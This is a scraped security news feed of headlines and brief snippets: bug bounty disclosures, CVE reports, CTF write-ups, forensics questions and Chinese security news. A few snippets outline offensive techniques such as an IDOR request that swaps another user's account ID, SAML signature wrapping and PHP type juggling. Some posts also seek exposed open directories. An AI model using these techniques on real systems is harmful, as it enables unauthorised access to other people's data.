    Introduction Continue reading on InfoSec Write-ups »
    NahamCon CTF 2022 Write-up: Click Me! Android challenge
    No content preview
    TryHackMe — Content Discovery
    No content preview
  • Open

    Vulnerabilities that shook the internet
    Introduction Continue reading on InfoSec Write-ups »
    NahamCon CTF 2022 Write-up: Click Me! Android challenge
    No content preview
    TryHackMe — Content Discovery
    No content preview
  • Open

    Ethical Hacking and other stuff
    I found this open directory. It contains tons of books and material related to ethical hacking. I am not sure about the quality of content, would like someone experienced in this field to comment on it. Tagging as NSFW as I haven't gone through all dirs. https://lira.epac.to/DOCS-TECH/Hacking/ submitted by /u/grvsood [link] [comments]
  • Open

    Rails – XSS Vulnerability in Action View
    Article URL: https://discuss.rubyonrails.org/t/cve-2022-27777-possible-xss-vulnerability-in-action-view-tag-helpers/80534 Comments URL: https://news.ycombinator.com/item?id=31224906 Points: 1 # Comments: 1
    Reflected XSS Vulnerability Found in WordPress Anti-Malware Firewall
    Article URL: https://www.searchenginejournal.com/vulnerability-found-in-wordpress-anti-malware-firewall/448101/ Comments URL: https://news.ycombinator.com/item?id=31223394 Points: 1 # Comments: 0
  • Open

    iPhone Password cracking possible with ??
    Hi community … heard about Grayshift tool for conducting iOS forensics investigation …. Wanted to know how’s that tool able to crack the passcode or on the latest versions of iOS like 15.3 … how’s it able to recover most of data by breaking the code Any insights on this or on iOS forensics on latest versions would help .. Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Changes In The Use Of LNK Files
    Not long ago, I posted regarding how LNK files can be (ab)used; the post refers to LNK file metadata, and how, if the LNK file is sent by the threat actor, that metadata can be used to learn about the threat actor's environment. I first saw this mentioned by JPCERT in 2016, where they included an interesting graph (figure 1) in their post to illustrate the point. Tony Lambert recently shared via his blog a change in Emotet TTPs, that the threat actor group had moved to using LNK files as an initial delivery mechanism. In the post, Tony described this as "a really interesting TTP change", and that it was "odd but not unexpected". Tony also shared a link to download a copy of the LNK file, as well as metadata parsed from the LNK sample via EXIFTool. I don't often use EXIFTool for this sort …
  • Open

    As an ethical hacker, network scanning techniques, also known as path tracing, can assist you in learning about a network’s logical configuration.
    submitted by /u/RaccoonCivil5453 [link] [comments]
    Analysis of phishing kill chain identifies emerging technique that exploits trust in your collaboration platforms
    submitted by /u/boybeaid [link] [comments]

  • Open

    Best OS for exploit development against Windows
    What is the best OS to develop windows exploits? Currently using Kali with VMware workstation. What does everyone else use? submitted by /u/FutureMasterRoshi [link] [comments]
  • Open

    wired or looks like malicious behaviors but are actually normal
    What are the wired system or network behaviors that you think they are wired and should be alerted but actually, are very common? Let me get started. ​ Splunk and Nessus both love using long B64 Powershell encoded commands to do stuff. Lots of legit stuff running Whoami as System submitted by /u/Calm_Scene [link] [comments]
    What tech should I be learning?
    I’ve been in IT for over 10 years. Jack of all trains master of none. I’ve got experience with Linux, Windows, network engineering, and security. Several SANS certs. Vendor certs expired years ago. Trying to move more towards security. Currently learning more about SIEM and detection with Wazuh. One thing I’m lacking is any programming or even scripting skills. About to learn Python. Powershell is also on the list. Other security interests include the following. 1. Compliance 2. Prevention 3. Detection Any technologies I should be looking into? Any topics I should read up on? Thanks! submitted by /u/damienhull [link] [comments]
  • Open

    War in Ukraine / April 29
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Maltego for the poor or what are the free add-ons for it
    A long time ago I decided to write an article about making work with Maltego cheaper. The product is definitely great. But very expensive… Continue reading on Medium »
    Services for detecting deepfakes
    Fake Profile Detector (Deepfake, GAN) — this AI model only works on StyleGAN images used to create fake human faces of people that don’t… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-30 Review
    回顾 2021 年在野利用的 0day 漏洞 by ourren Smarty 模板注入与沙箱逃逸 by ourren 有趣的MISC by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-30 Review
    回顾 2021 年在野利用的 0day 漏洞 by ourren Smarty 模板注入与沙箱逃逸 by ourren 有趣的MISC by ourren 更多最新文章,请访问SecWiki
  • Open

    SAML Injection
    🔍 Introduction SAML Injection은 Security Assertion Markup Language (SAML) 에서 발생할 수 있는 Injection 공격을 의미합니다. SAML Process에서 XML 구문 내 공격코드를 통해 SSO 등 인증 과정을 우회하거나 Signature 검증을 통과할 수 있습니다. 🗡 Offensive techniques Detect SAML을 이용한 SSO 등 SAML 사용 구간은 모두 점검의 대상이됩니다. 기본적으로 Signature 검증에 대한 체크를 진행하며, XSW(XML Signature Wrapping) Attack 등으로 SAML Response/Assertion 메시지에 값을 추가하거나 변조하여 서버의 반응을 보고 체크할 수 있습니다.
    Type Juggling (Loose Comparison Bug)
    🔍 Introduction Type Juggling은 복수의 변수를 비교할 때 사용되는 Loose/Strict Comparison에 따라 개발자가 의도하지 않은 값으로 if 문 등을 통과할 수 있는 취약점을 의미합니다. 일반적으로 PHP가 영향을 받는 것으로 알려져 있습니다. 보통 PHP type juggling 또는 Magic hashes attack으로 많이 알려져 있습니다. Comparison Equal Not Equal Description Loose == != the same value Strict === !== the same type and the same value 🗡 Offensive techniques Detect PHP 코드상에서 == 또는 !
    IDOR (Insecure Direct Object Reference)
    🔍 Introduction IDOR(Insecure Direct Object References)는 Access Control에서 발생하는 취약점 중 외부에 노출되거나 제공되는 입력이 Object에 직접 참고하고 엑세스할 때 이를 이용하여 본인의 권한을 넘어서는 액션을 수행할 수 있습니다. Origin Request 1 GET /info?accountId=15442 IDOR Request 1 GET /info?accountId=1110 일반적으론 Horizontal privilege escalation 즉, 수평적으로 권한을 악용할 수 있지만 때때로 어플리케이션 구성이나 정책에 따라서 Vertical privilege escalation(수직적 권한 상승)으로 연결될 수 있습니다. 🗡 Offensive techniques Detect 어플리케이션 처리 로직에서 사용자 입력 값이 Object에 직접 참조되는 부분들이 모두 영향 받습니다.
  • Open

    Sensitive Data Exfiltration through XSS ($450)
    The story of my first bounty… Continue reading on Medium »
    Page Admin Disclosure when Posting a Reel
    Hello , I’m Syd from the Philippines. Today I would like to share one of my findings in Meta Bug Bounty Program. The bug that I found is… Continue reading on Medium »
    Bypassing File Upload Restriction using Magic Bytes
    Hello Hunters & Ninjas, Article is very late, for that accept my apology. Today I’m going to write about one of my finding in which an… Continue reading on Medium »
    Burp Suite Extension for AWS Signing
    AWSSigner Continue reading on Medium »
    ATO without any interaction [aws cognito misconfiguration]
    Hello friends, Continue reading on Medium »
  • Open

    com.nextcloud.client bypass the protection lock in andoid app v 3.18.1 latest version.
    Nextcloud disclosed a bug submitted by dashingjaved: https://hackerone.com/reports/1450368 - Bounty: $200
  • Open

    RW-Fuzzer: A Fuzzing Method for Vulnerability Mining on Router Web Interface
    submitted by /u/paran0ide [link] [comments]
  • Open

    Music/Games (pretty slow)
    https://www.7xr.nl submitted by /u/whopops [link] [comments]
  • Open

    HELP !! with Volatility
    Every time I run a command using volatility I get the following output: ​ Volatility Foundation Volatility Framework 2.6 INFO : volatility.debug : Determining profile based on KDBG search... No suitable address space mapping found Tried to open image as: MachOAddressSpace: mac: need base LimeAddressSpace: lime: need base WindowsHiberFileSpace32: No base Address Space WindowsCrashDumpSpace64BitMap: No base Address Space WindowsCrashDumpSpace64: No base Address Space HPAKAddressSpace: No base Address Space VirtualBoxCoreDumpElf64: No base Address Space VMWareMetaAddressSpace: No base Address Space QemuCoreDumpElf: No base Address Space VMWareAddressSpace: No base Address Space WindowsCrashDumpSpace32: No base Address Space Win10AMD64PagedMemory: No base Address Space WindowsAMD64PagedMemory: No base Address Space LinuxAMD64PagedMemory: No base Address Space AMD64PagedMemory: No base Address Space IA32PagedMemoryPae: No base Address Space IA32PagedMemory: No base Address Space OSXPmemELF: No base Address Space FileAddressSpace: Location is not of file scheme ArmAddressSpace: No base Address Space ​ Any help is more than welcome. Thank you!! submitted by /u/maxoberto [link] [comments]

  • Open

    Root Cause Analysis
    One of the challenges within DFIR, particularly as we've moved to an enterprise approach by leveraging EDR telemetry, is the root cause analysis, or "RCA". In short, the challenge is observing malicious activity and determining the root cause; the challenge itself stems from the fact that EDR telemetry is only partial visibility, or that correlating observed malicious activity with causal data not evident or available via EDR telemetry requires additional context, and by extension, additional effort/expenditure of resources. It also requires an additional "leveling up" of skillsets.  Yes, many organizations that deploy EDR tooling also include a means for extracting additional files/data from the endpoint, and what to collect isn't usually in question. Rather, how to truly exploit the coll…
  • Open

    Lots of different stuff, including north korean electronic music
    submitted by /u/omnifage [link] [comments]
    Collection of PDF books about HTML, CSS, JavaScript, Python and others
    http://198.74.52.119/ submitted by /u/senpie95 [link] [comments]
  • Open

    Bug Bounty Operating Principles
    Experiences from a number of programs, and trying to be fair, generous, and grateful to security researchers. Continue reading on Medium »
    How was I able to find my first bug in a real website?
    It was the days of August 2020 when I used to try to find XSS (Cross-Site Scripting) vulnerability because of the curiosity that I… Continue reading on Medium »
    OTP Bypass + PATO = 100 Dollars Bounty
    Hello ppl! This is Gnana Aravind here with another awesome write-up explaining the story of my recent bounty. Continue reading on Medium »
    New Vault in Hats.Finance
    We are excited to onboard Temple DAO to the Hats bug bounty program! They have decided to open their bug bounty vault with 450,000 $TEMPLE… Continue reading on Medium »
    Introduction to Smart Contract why it is so demanding in the IT world…
    Started my research a month ago into Smart Contracts as a Security Analyst of Avalance Global Solutions and that’s why I want to share my… Continue reading on Medium »
  • Open

    Hackthebox: Infiltration
    Lab: OSINT Continue reading on Medium »
    War in Ukraine / April 28
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Social pages monitoring
    I propose to discuss today such an issue as the organization of monitoring the social pages of employees. Otherwise, there is a great risk… Continue reading on Medium »
    Media monitoring in OSINT
    Today we will talk about monitoring mentions in the media using free sources: Continue reading on Medium »
    OSINT: It’s just Googling
    Olympic sprinting: It’s just moving your legs dead fast. Continue reading on Medium »
  • Open

    Reverse Engineering PsExec for fun and knowledge
    submitted by /u/CyberMasterV [link] [comments]
    MacOS Forensics/ SANS FOR518
    Hey y'all, TLDR; I'm new to MacOS Forensics and need to purchase a mac for the SANS FOR518, but confused around the hardware requirements. Is virtualisation on a mac essential if I already have a Windows workstation? Could I get through the course/ real world forensics with a M1 mac? I'm looking at enrolling the SANS FOR518 Mac Forensics online and it states that an Intel Mac is required. 1) Is an Intel Mac a critical requirement in the real world forensics, or will a M1 mac be a better investment in the long term (performance, futureproofing)? I have a Windows machine to run Windows/ Linux VMs. 2) What virtualisation is required during the FOR518 course? Is it to run Windows/ Linux tools or to virtualising a suspect image? 3) Macbook Air or Macbook Pro? Does the Macbook pro offer any significant benefits over the Macbook Air for the forensic use case? I'm looking at the base 8GB model - maybe 16GB if I absolutely need it. Appreciate any advice! submitted by /u/hiddenbytes [link] [comments]
    DoD Contracting Digital Forensics
    Greetings, Anyone have any experience doing digital forensics contracting for the DoD? A recruiter from Akima reached out to me for a contracted position for a federal agency doing exactly what I do now (digital forensics for law enforcement). The pay is nearly double and nets me a Top Security clearance (I previously held Public Trust). I would be crazy not to make the jump, right? submitted by /u/BlockchainForensics [link] [comments]
    Current free training?
    I know there was some posts about this a while ago, but nothing current. Anyone know of any free trainings related to computer/phone forensics? submitted by /u/foxcop91 [link] [comments]
  • Open

    Reflected XSS due to vulnerable version of sockjs
    Automattic disclosed a bug submitted by chip_sec: https://hackerone.com/reports/1100326 - Bounty: $250
    Hardcoded AWS credentials in .msi
    8x8 disclosed a bug submitted by chip_sec: https://hackerone.com/reports/1368690
    Reflected XSS []
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1309385
    Reflected XSS []
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1309237
    lfi in filePathDownload parameter via
    U.S. Dept Of Defense disclosed a bug submitted by exploitmsf: https://hackerone.com/reports/1542734
    Sensitive data exposure via /secure/QueryComponent!Default.jspa endpoint on
    U.S. Dept Of Defense disclosed a bug submitted by njmulsqb: https://hackerone.com/reports/1278977
    SSRF due to CVE-2021-27905 in www.
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1183472
    vulnerable to CVE-2022-22954
    U.S. Dept Of Defense disclosed a bug submitted by null_bytes: https://hackerone.com/reports/1537543
    Blind SQL Injection
    U.S. Dept Of Defense disclosed a bug submitted by mido0x0x: https://hackerone.com/reports/771215
    SQL INJECTION in https:///
    U.S. Dept Of Defense disclosed a bug submitted by mido0x0x: https://hackerone.com/reports/723044
    Possibility to force an admin to install recommended applications
    Nextcloud disclosed a bug submitted by igorpyan: https://hackerone.com/reports/1403614 - Bounty: $100
    OAUTH2 bearer not-checked for connection re-use
    Internet Bug Bounty disclosed a bug submitted by monnerat: https://hackerone.com/reports/1552110 - Bounty: $2400
    CVE-2022-22576: OAUTH2 bearer bypass in connection re-use
    curl disclosed a bug submitted by monnerat: https://hackerone.com/reports/1526328
    DoS via large console messages
    Mattermost disclosed a bug submitted by thesecuritydev: https://hackerone.com/reports/1243724 - Bounty: $150
    CVE-2022-27776: Auth/cookie leak on redirect
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551591 - Bounty: $480
    CVE-2022-27775: Bad local IPv6 connection reuse
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551588 - Bounty: $480
    CVE-2022-27774: Credential leak on redirect
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551586 - Bounty: $2400
  • Open

    SecWiki News 2022-04-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Introducting MutableSecurity: Seamlessly deployment and management of security solutions
    submitted by /u/iosifache [link] [comments]
    Be aware of this trick: Python module hijacking leading to code execution
    submitted by /u/slashtmp00 [link] [comments]
  • Open

    Best Nessus parser that works with v10 for free/cheap?
    We currently use Nessus Pro for vulnerability scanning. However the output reports it generates are not very helpful, often there can be 10 or 20 lines in the output CSV that refers to the same vulnerability on the same computer, whereas what we need is an actual actionable report that says these PCs have this vulnerability which you fix with this patch, or something similar. I found this article https://www.sans.org/blog/data-data-everywhere-what-to-do-with-volumes-of-nessus-output/ however it is from 2014 and the parser it links to is from 2017 and seems to require a Linux installation with Perl, we are a Windows organisation. Is there an up to date piece of software which does this kind of thing either free or low cost and runs on Windows? We can't afford Tenable.io for our entire workstation estate, this is why we have Nessus instead. submitted by /u/danj2k [link] [comments]
    Are soc roles notoriously slow?
    Got my first tier 1 soc role for a small company (2k employees) My training was watch vpshere and contact virtualization admin if anything goes over 90% usage for more than 10 mins. watch logrythm. The baseline is 5k logs. Report if it goes over for an extended period of time. answer SolarWinds alarms. Report if it's not a false positive.   That's it. That's what I do all day every day for 63k a year. How does this translate into a higher role? "Yeah I'm good at staring at a dashboard all day" Why can't they just tack this on as an additional responsibility to help desk or the sys admin? I dread the day the Company realizes they're wasting 60k * 6 employees to operate a 24/7 soc when all we do is watch Netflix all day and then they lay us off and I didn't even get any transferable skills to help get me a replacement job. Regarding certs, I've received a lot of bad feedback on certs. No job interview has ever even asked about my certs. People always flame and say "why would I hire a cert chaser?" Because I have a bunch already. All comptia which I know doesn't compare to something like cissp but certs have just left a bad taste in my mouth. I have A+ net+ sec+ cysa+ pentest+ and az900. submitted by /u/guywithaquestchin [link] [comments]
    Shodan vs Criminal ip
    I mentioned a search engine and a product called Criminalip a while ago! I think the page is open now, and I'm using one feature or another. I saw a post posted by a developer on the OSINT channel about criminalip, but I'm still a beginner, so I don't understand what you mean. But what I can see exactly is that it looks quite similar to Shodan. Which do you think is more valuable in terms of studying security compared to shodan and criminalip? Below is the link to the post of the developer and the related post I posted a while ago. ​ ​ https://www.reddit.com/r/OSINT/comments/ucyo2c/we_made_a_new_osint_tool_criminalipio_i_would/ ​ https://www.reddit.com/r/netsecstudents/comments/uct4pn/search_engine_preregistration_criminal_ip/ submitted by /u/Alexiosplana [link] [comments]
    Security Architecture study recommendations
    Hi, I am hoping to get some advice on which particular study/certification would be best suited to improving and consolidating my current experience. First a bit of background. I’ve been working in IT since 2004 and moved into network security in 2007. I’ve always worked for service providers who provided network security consultancy and expertise so I have about 15 years experience mostly in implementation of firewalls, web proxies, load balancers, IPS, AAA, VPN, some virtualisation, that kind of stuff. I’ve worked in some of the largest and most well known companies providing mostly deployment capabilities in these types of technologies for customers mostly in banking and telco industries. I would say about 85% deployment and 15% design. A large portion of the deployment work however w…
  • Open

    Trello From the Other Side: Tracking APT29 Phishing Campaigns
    submitted by /u/dmchell [link] [comments]
    Cybersecurity conferences
    Hi guys! Does anybody know what are the most interesting hacking and cybersecurity conferences in Europe? submitted by /u/Derrick_Wallarm [link] [comments]
  • Open

    Red Teaming Toolkit
    This repository contains cutting-edge open-source security tools (OST) that will help you during adversary simulation and as information… Continue reading on Medium »
  • Open

    Flask之session伪造
    前言本文结合CTF中遇到的题目来说一下session伪造,虽然已经有很多师傅写了,而且写的都特别好,但是还是想自己记录一下,也方便以后复习。ciscn中就有一个session伪造的题,由于之前没有做过
    法国一医疗软件公司因泄露49万患者数据被罚150万欧元
    近日,法国监管机构国家信息与自由委员会(CNIL)对医疗软件供应商迪达勒斯生物公司(Dedalus Biology)处以150万欧元的罚款。
    法国一医疗软件公司因泄露49万患者数据被罚150万欧元
    近日,法国监管机构国家信息与自由委员会(CNIL)对医疗软件供应商迪达勒斯生物公司(Dedalus Biology)处以150万欧元的罚款。
    移动发送奇怪短信?我想起了通讯行业的核弹级漏洞
    有意思的是,这个漏洞虽然存在已久,但是却一直在被攻击者利用。今天咱们就再聊聊这个神奇的SS7漏洞。
    NSA网络基础设施安全指南(翻译)(三)
    本报告介绍了总体网络安全防护和网络设备保护的最佳实践,从而可以帮助管理员防止对手利用其网络进行攻击。这份指南提供的指导是通用,可以用于多种类型的网络设备。
    漏洞分析篇:栈溢出(CVE-2006-3439)漏洞分析
    漏洞是微软06年爆出的Server服务器栈溢出导致的远程代码执行漏洞。
    从0到1之安全运营如何做好监控?| FreeBuf甲方社群直播回顾
    网络安全运营即如何发现不足、分析成因、如何解决及避免事件再度发生。
    FreeBuf甲方群话题讨论 | 聊聊企业攻防实战演练
    如今的攻防实战演练应该常态化进行,对安全进行“摸底”?疫情条件下的远程办公会对攻防实战演练带来哪些变化或影响?
    攻击者劫持大量WordPress网站,对乌克兰进行DDoS攻击
    攻击者正在对亲乌克兰网站和政府门户网站进行 DDoS(分布式拒绝服务)攻击。
    FreeBuf周报 | 北京健康宝遭境外网络攻击;可口可乐证实受到网络攻击并开展调查
    Gartner称,安全和风险管理领导者需要应对七大趋势,才能使企业不断扩张的数字足迹免受新威胁。
    议题前瞻丨关于零信任架构在金融企业中应用的思路探讨
    跟随大佬,以“零信任的实际需求”为切入口,从理念到实践,提升每一个安全从业者对零信任架构的认知。
    微软修复了暴露用户数据库的ExtraReplica Azure漏洞
    这些漏洞可能让恶意用户在绕过身份验证后提升权限并获得对其他客户数据库的访问权限.
    研究发现,支付赎金只占勒索攻击事件总损失的 15%
    受害者由勒索导致的事件响应工作、系统恢复、法律费用、监控成本以及业务中断的整体影响所带来的财务支出比例远超赎金金额。
    官方通告,北京健康宝遭境外网络攻击
    4月28日,北京健康宝使用高峰期遭受网络攻击,经初步分析,网络攻击源头来自境外。
    Spring框架-CVE-2022-22965分解分析
    关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解。
  • Open

    ExtraReplica – a cross-account database vulnerability in Azure PostgreSQL
    Article URL: https://www.wiz.io/blog/wiz-research-discovers-extrareplica-cross-account-database-vulnerability-in-azure-postgresql/ Comments URL: https://news.ycombinator.com/item?id=31203059 Points: 1 # Comments: 0
    Passing Time Syncing Secrets:Demonstrating Covert Channel Vulnerability in PTP
    Article URL: https://media-exp1.licdn.com/dms/document/C562DAQHsEBEOv6vilA/profile-treasury-document-pdf-analyzed/0/1650330515418?e=2147483647&v=beta&t=LKNnvu80n_mLo7USD2tudioeaERrXwGXqYIwNSODO64 Comments URL: https://news.ycombinator.com/item?id=31201656 Points: 1 # Comments: 1
  • Open

    Hacked Website Threat Report 2021
    Our 2021 Website Threat Research Report details our findings and analysis of emerging and ongoing trends and threats in the website security landscape. We’ve put together this analysis to help keep website owners informed and aware of the dangers posed by malicious actors. This year’s report is a collection of observations made by Sucuri’s Research and Remediation teams from data collected on web-based malware, vulnerable software, and attacks during 2021. The data used in this report is a representative sample of the total number of websites that our Remediation team performed services for throughout the year 2021, as well as more than 132 million SiteCheck scans. Continue reading Hacked Website Threat Report 2021 at Sucuri Blog.

  • Open

    Steganography for E01 files??
    I have an E01 file that I know has some data inside, but I cant find any software that can extract from an E01 file. It's 2.6GB so I don't really want to do it manually. Do you guys have any suggestions? submitted by /u/KTthemajicgoat [link] [comments]
    Android TV examination
    Hello, has anyone had any experience of examining a device (television) running the Android TV OS or similar? I'm not aware of any digital forensics software (Cellebrite etc) that you could use for such a task so presumably the only option is a manual examination. There seems to be very little information or discussion around this so any thoughts would be appreciated. submitted by /u/dwaynehicks2179 [link] [comments]
  • Open

    Socket: New tool takes a proactive approach to prevent OSS supply chain attacks
    submitted by /u/feross [link] [comments]
    LAPSUS$: Recent techniques, tactics and procedures
    submitted by /u/digicat [link] [comments]
    Kubernetes Goat - Interactive Kubernetes Security Learning Playground 🚀
    submitted by /u/madhuakula [link] [comments]
    reposaur - use Rego to audit your GitHub org security posture
    submitted by /u/fproulx [link] [comments]
    Colibri Loader's Unique Persistence Technique Using Get-Variable Cmdlet
    submitted by /u/sciencestudent99 [link] [comments]
    Anatomy of a Zero Day - How to decrypt....a robot?
    submitted by /u/312sec [link] [comments]
    How to save fiddler everywhere result in SEQUENCE it captured ? I'm trying to save the raw date IN SEQUENCE it captured but unable to save in sequece it captured.
    submitted by /u/sahastra [link] [comments]
    How to master Google Hacking (Dorking)
    submitted by /u/hisfuntie [link] [comments]
    Bypassing LDAP Channel Binding with StartTLS
    submitted by /u/AlmondOffSec [link] [comments]
    ExtraReplica: cross-account database vulnerability in Azure PostgreSQL
    submitted by /u/sagitz_ [link] [comments]
    nimbuspwn detector (CVE-2022-29799 & CVE-2022-29800) - check whether local system is possibly vulnerable
    submitted by /u/SRMish3 [link] [comments]
    FindFunc: An IDA plugin for advanced function matching by assembly template, constants, string/name/byte reference
    submitted by /u/feberx [link] [comments]
    Elevation of privilege Linux vulnerability: Nimbuspwn
    submitted by /u/0xdea [link] [comments]
  • Open

    Chrome 102: Window Controls Overlay, a Host of Finished Origin Trials, PWAs as File Handlers and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 102 is beta as of April 28, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Window Controls Overlay for Installed Desktop Web Apps Window controls overlay extends an app's client area to cover the entire window, including the title bar, and the window control buttons (close, maximize/restore, minimize). The web app developer is responsible for drawing and input handling for the entire window except for the window controls overlay. Developers can use this feature to make their installe…
  • Open

    War in Ukraine / April 27
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Gamified Vaults: Play, Find, Get Paid
    Hats Finance is introducing gamified vaults to the mix, allowing developers, white hats and security experts to test their Solidity… Continue reading on Medium »
    Contact Point Deanonymization Vulnerability in Meta
    This post is about an bug that I found on Meta (aka Facebook) which used to find a linked Primary email address of a account using mobile… Continue reading on Medium »
    We Rescued $4M from Rari Capital. But Was It Worth It?
    On April 6th, we discovered a verified Fuse pool in Rari Capital used a weak price oracle prone to manipulation. Usually, exploiting a… Continue reading on Medium »
    Subdomain Takeover using Mobile??
    Go to https://virustotal.com. Click on search section enter domain and click on search. Continue reading on Medium »
    It’s All About DMARC
    Hello Everyone, Continue reading on Medium »
  • Open

    SecWiki News 2022-04-28 Review
    链上追踪:洗币手法科普之波场 TRON by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-28 Review
    链上追踪:洗币手法科普之波场 TRON by ourren 更多最新文章,请访问SecWiki
  • Open

    NFT Crime: From the Simple to the Ingeniously Simple
    If you guessed these two things—a 10-kilo bar of gold and this image from the Bored Ape Yacht Club (BAYC)—cost about the same, roughly $600,000, you’d be right. And if it’s hard to believe this is true, you’d be like almost everyone else in the world. Basically, a one-of-a-kind cartoon in a type of video... The post NFT Crime: From the Simple to the Ingeniously Simple appeared first on TrustedSec.
  • Open

    PicoCTF 2022 Web Exploitation
    No content preview
    Hacking IPMI and Zabbix in HackTheBox — Shibboleth
    No content preview
  • Open

    PicoCTF 2022 Web Exploitation
    No content preview
    Hacking IPMI and Zabbix in HackTheBox — Shibboleth
    No content preview
  • Open

    PicoCTF 2022 Web Exploitation
    No content preview
    Hacking IPMI and Zabbix in HackTheBox — Shibboleth
    No content preview
  • Open

    What’s your favorite UEBA these days?
    I’m growing tired of Exabeam at a medium sized enterprise. Just using AA, feeding it from a data lake. I’ve been looking into it, but it can be difficult to cut through marketing jargon to determine if the tools are just SIEMs or if they do the modeling of a UEBA. submitted by /u/justaninfosecaccount [link] [comments]
    Legal Defense asking for Google Username/Password?
    I have a friend who is preparing for a legal defense (defamation case.) The company he hired to help prepare the defense asked for all case-associated email. They also asked for the his and his teams Google accounts and passwords to "do the email search for them." Obviously no one is going to share that level of access, but is asking enough of a red flag to fire the preparation company? Is this a common accepted ask for permission? Any frame of reference here? submitted by /u/Freakskull [link] [comments]
  • Open

    从0到1完全掌握 SSTI
    SSTI 即为对模板引擎的注入,从简单探测自己构造 EXP 的讲解。
    FreeBuf早报 | 北京健康宝遭境外网络攻击;有文件揭示Facebook违法使用用户数据
    4月28日,北京健康宝使用高峰期遭受网络攻击,经初步分析,网络攻击源头来自境外,受攻击期间,北京健康宝相关服务未受影响。
    链上追踪:洗币手法科普之波场 TRON
    TRON 上没有混币器,黑客又是如何洗币?
    最新全球网络攻击事件大盘点-政府&企业
    政府&amp;企业:全球范围内最新网络攻击中的代表性事件大盘点
    Linux Nimbuspwn漏洞可能允许攻击者部署复杂的威胁
    攻击者可以利用该漏洞进行各种恶意活动.
    影响甚微 数据泄露后Conti活动有增无减
    近日,戴尔旗下安全公司Secureworks的研究人员表示,尽管受到近期内部数据泄露的影响, Conti勒索软件团伙的活动依旧非常活跃。
    影响甚微 数据泄露后Conti活动有增无减
    近日,戴尔旗下安全公司Secureworks的研究人员表示,尽管受到近期内部数据泄露的影响, Conti勒索软件团伙的活动依旧非常活跃。
    Gartner:响应网络安全事件的3个必备工具
    从 Gartner 披露的信息来看,2021 年发生的安全事件平均违规成本达到了 17 年以来的峰值。
    美国悬赏1000万美元,征集6名俄罗斯沙虫组织成员线索
    美国政府提供了高达 1000 万美元的奖金,悬赏六名俄罗斯黑客。
    2021年利用最多的前15个漏洞出炉,附列表
    网络安全当局在联合咨询报告中进一步敦促企业和组织,应及时修补这些安全漏洞并实施补丁管理系统以减少暴露的攻击面。
    今年一季度暴露的数据库数量创新高,Redis排第一
    2022 年第一季度,暴露的数据库峰值数量达到了 91200 个,创造了历史记录。
  • Open

    Automate Active Directory(Installation(Packer)+Provisioning(Vagrant))
    Hi Readers, Here we will be looking into automation of ad deployment. This challenge is part of Auror Project initiative by Zscaler’s… Continue reading on Medium »
  • Open

    subdomain takeover (abandoned Zendesk .easycontactnow.com)
    8x8 disclosed a bug submitted by bx_1: https://hackerone.com/reports/1486670
  • Open

    New dork here, nice place.
    I am confused how this entirely works though. I tried drive.google.com/drive/folders and it just wanted to log me into my own google drive? So I’ve tried using a few of the front ends, and they’re nice. I just don’t feel like I’m stomping through the mud like I wanted, you know? So how does one do the basic, dig through random unsecured files thing? Also, what is a percentage chance I find something fun/dangerous? Glad to be here folks! submitted by /u/Mr_Goodnite [link] [comments]
    A lot of old 3D Images, ranging from 1996-2006
    submitted by /u/cicada-man [link] [comments]
  • Open

    RFC 9116: A File Format to Aid in Security Vulnerability Disclosure
    Article URL: https://www.rfc-editor.org/rfc/rfc9116 Comments URL: https://news.ycombinator.com/item?id=31188124 Points: 1 # Comments: 0

  • Open

    Undesignated File during Examination
    When you examine a mobile data set case where the data is previously extracted and your files are not designated what is the methodology to turn them into workable data like a .db file? My extraction folder is essentially the usual plist and mbdb files and a 1kb to 2000kb series of files like: Description: 5435435hjhj45454521 Type: File ​ Any terminology or process to explain or aid my google research would be immensely helpful submitted by /u/CharsCour [link] [comments]
    What’s after LE forensics?
    Hello InfoSec peeps, I have been a digital forensic analyst for a law enforcement organisation in the UK for about 3 years now. I love digital forensics but the work within law enforcement has become extremely tedious for several reasons which I assume most of you will be aware of (prohibited images being 90% of the work + not a massive amount of actual analysis going on due to the first reason as more often than not their is no need). I have experience with the majority of forensic tools you’d expect LE to have and very well informed regarding laws and legislations. In addition to this, I have very good InfoSec knowledge from self study and research. I am now beginning to explore other career paths but I am slightly lost as to what my potential next steps and career trajectory could…
    Champlain College: M.S. in DF or M.S. InfoTech with DFIR Concentration
    My hope is to enter a digital forensics role, but I also don’t want to pigeonhole my career to only be able to do that. Would I be better off doing InfoTech with DFIR? submitted by /u/invictusliber [link] [comments]
  • Open

    Looking For Vulnerable Redis Servers (CVE-2022-0543)
    submitted by /u/chicksdigthelongrun [link] [comments]
    DEGU: userland kit that doesn't use sys_clone/sys_execve call to run
    submitted by /u/Background-Degree-50 [link] [comments]
    A flow-based IDS using Machine Learning in eBPF
    submitted by /u/paran0ide [link] [comments]
    Reverse Engineering PsExec for fun and knowledge
    submitted by /u/CyberMasterV [link] [comments]
    Hands-on lab for exploiting Psychic Signatures in JWTs
    submitted by /u/DebugDucky [link] [comments]
